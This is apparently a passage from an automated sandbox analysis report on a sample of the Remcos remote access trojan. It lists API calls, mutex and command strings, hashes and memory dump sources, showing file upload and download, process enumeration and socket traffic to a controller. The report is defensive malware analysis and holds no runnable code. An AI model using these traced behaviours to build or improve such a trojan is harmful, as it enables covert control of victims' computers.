                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040CAD0
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040CADC
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 0040CAF4
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • __aulldiv.LIBCMT ref: 0040CB38
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040CB71
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(0040C0FA,00000000,?,?,0000FDE8,00000000), ref: 0040CB85
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,0000FDE8), ref: 0040CB95
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,0000FDE8,?), ref: 0040CBA6
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filedown,00415268,?,00415268,00000001,00415268,?,00415268,00000000,00415268,00000000,00415268,?,00415268,00000000), ref: 0040CBF1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00000000), ref: 0040CC01
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00000000), ref: 0040CC0E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC1E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00000000), ref: 0040CC2E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040CC3E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC4E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC5B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC6B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC7B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC8B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CC9B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCAB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCD4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCE0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCEC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCF8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD04
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD0D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD19
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD25
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD31
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD46
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD52
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD5E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD67
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD70
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CD79
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CCB5
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,0000FDE8,00000000), ref: 0040CDBA
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040CDE3
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopenfile,00415268,?,00415268,?), ref: 0040CE08
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040CE15
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040CE22
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040CE2C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE41
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE4A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE53
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE61
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE75
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE7E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE87
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040CE90
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$D@std@@@std@@$??0?$basic_string@$?close@?$basic_ifstream@D@1@@V10@@V12@$??0?$basic_ifstream@??2@?c_str@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@H@2@V01@@V?$fpos@W4seekdir@ios_base@2@@__aulldivconnectfree
                              • String ID: err_notopenfile$filedown
                              • API String ID: 289020620-2089879270
                              • Opcode ID: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                              • Instruction ID: 75517663f7f8035d4815827909ffde7696f2aa65873f957ae4acf3b8a579f94d
                              • Opcode Fuzzy Hash: d6b9cf1e4c66e6d906bea925c1d0ab002b0e340bedd8bcae2632eb85ff239588
                              • Instruction Fuzzy Hash: 12B13171D0011EDBDF14EBA0ED899DEBB78BF55304F1041B6F506A2091EA785E89CFA8

                              Control-flow Graph (graph image not reproduced; entry block 407e0b-407e46, edge list omitted)
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                              • Process32First.KERNEL32(?,?), ref: 00407E79
                              • Process32Next.KERNEL32(?,00000128), ref: 00407E88
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00407EA8
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                              • Process32Next.KERNEL32(?,00000128), ref: 00407EFF
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F59
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00407F80
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F89
                              • CloseHandle.KERNEL32(?), ref: 00407F92
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00407F99
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FA8
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FBC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407FC5
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(Program Files\,00000000), ref: 00407FDF
                              • ?replace@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@IIPBD@Z.MSVCP60(00000000,?,Program Files (x86)\), ref: 00408004
                              • ??8std@@YA_NPBDABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00408015
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408029
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408037
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(?,00000025,00000001), ref: 0040804E
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040805A
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00408072
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040808B
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 0040809D
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 004080B3
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 004080BF
                              • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 004080CD
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004080D9
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 004080F7
                              • CloseHandle.KERNEL32(00000000), ref: 00408110
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408121
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040812A
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040813A
                                • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$D@std@@@std@@$??8std@@V?$basic_string@$D@2@@0@V12@$Process32$??0?$basic_string@??4?$basic_string@?begin@?$basic_string@?c_str@?$basic_string@CloseCreateD?$basic_ifstream@D@1@@HandleNextV01@V01@@$??0?$basic_ifstream@??2@?assign@?$basic_string@?close@?$basic_ifstream@?end@?$basic_string@?find@?$basic_string@?is_open@?$basic_ifstream@?read@?$basic_istream@?replace@?$basic_string@?seekg@?$basic_istream@?tellg@?$basic_istream@D@2@@0@0@D@2@@0@@FileFirstH@2@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@V?$fpos@W4seekdir@ios_base@2@@
                              • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                              • API String ID: 168093837-694575909
                              • Opcode ID: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                              • Instruction ID: b1c41ab4f00258a1a6098e1fdbc2013eb857e20770a4aaf06870f1c586b70205
                              • Opcode Fuzzy Hash: e896c0f694c6f06206d8c366154feaaca3565989338bc99d73008fd01af66141
                              • Instruction Fuzzy Hash: 21913E7290011AABCF14DBA0DD5DAEE7B78EF14315F1040BAF506B60A1DF785ACACB58
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,6A41AFB0), ref: 0040C652
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668,?,00000000,6A41AFB0), ref: 0040C674
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(6A41AFB0), ref: 0040C687
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C690
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,6A41AFB0), ref: 0040C6AD
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040C6BA
                              • realloc.MSVCRT ref: 0040C6C7
                              • recv.WS2_32(00000000,00000000,00001388,00000000), ref: 0040C6DA
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000,00000000,00001388,00000000), ref: 0040C6F2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C6FC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C705
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C712
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 0040C731
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C740
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C74A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C764
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C76D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00001388), ref: 0040C77E
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C79A
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C7B3
                              • _itoa.MSVCRT ref: 0040C7CD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,uploadprogress,00415268,?), ref: 0040C7F0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 0040C7FA
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040C80D
                              • free.MSVCRT(00000000,00000000,00000000,00001388,00000000), ref: 0040C823
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C831
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C83A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?), ref: 0040C843
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040C855
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040C868
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040C872
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040C88C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C895
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6A3F5E04), ref: 0040C8AB
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040C8B5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8BE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040C8CB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8D4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8DD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040C8E6
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V01@V01@@$??4?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$?data@?$basic_string@?empty@?$basic_string@?length@?$basic_string@Hstd@@$??9std@@?c_str@?$basic_string@?size@?$basic_string@$?substr@?$basic_string@A?$basic_string@V10@V10@0@V10@@V12@Y?$basic_string@_itoafreereallocrecvsend
                              • String ID: uploadprogress
                              • API String ID: 1859615858-2474510805
                              • Opcode ID: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                              • Instruction ID: 86ffff36a635555f350e847bfc49deda06467b1ca712684e8777b20748256a1b
                              • Opcode Fuzzy Hash: 6d6c9c9385e79f9249ba2603a9bda54aab23c088a9234a87ba989a808e4094b5
                              • Instruction Fuzzy Hash: 4E81FB7290011AABCF04EBA0ED9D9ED7738BF54305F1481AAF506A21A0DFB85A49CB58
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,6A41AFB0), ref: 00403DAF
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(offlinelogs), ref: 00403DCA
                              • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403DFB
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403E0F
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403E1C
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403E28
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403E40
                              • ??2@YAPAXI@Z.MSVCRT ref: 00403E50
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403E63
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(?,00000000), ref: 00403E73
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403E7F
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403E93
